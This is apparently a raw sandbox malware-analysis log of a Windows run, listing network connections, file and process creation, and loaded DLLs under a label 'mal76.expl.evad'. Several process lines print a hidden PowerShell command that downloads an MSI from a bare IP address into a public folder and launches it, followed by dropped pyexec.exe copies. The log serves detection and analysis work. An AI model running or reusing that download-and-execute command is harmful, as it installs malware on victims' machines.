          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49795 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49828 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49840 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49915 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49916 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.16:49917 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49918 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49919 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.74.254:443 -> 192.168.2.16:49935 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 150.171.74.254:443 -> 192.168.2.16:49938 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49939 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 40.74.67.245:443 -> 192.168.2.16:50000 version: TLS 1.2
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59ef9e.msiJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B7427398-E4B0-4576-85DB-A59FEFF250F5}Jump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF0C7.tmpJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59efa0.msiJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\59efa0.msiJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\59efa0.msiJump to behavior
          Source: classification engineClassification label: mal76.expl.evad.win@43/305@90/34
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdhzzz2z.brt.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1944,i,10072944039873156587,3797958150619069762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://winningwriters.com"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\users\public\2as.msi"
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Initiate\pyexec.exe "C:\Users\user\AppData\Local\Initiate\pyexec.exe"
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeProcess created: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe "C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe"
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1944,i,10072944039873156587,3797958150619069762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\users\public\2as.msi" Jump to behavior
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Local\Initiate\pyexec.exe "C:\Users\user\AppData\Local\Initiate\pyexec.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Initiate\pyexec.exeProcess created: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exe C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\ServiceAlt\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
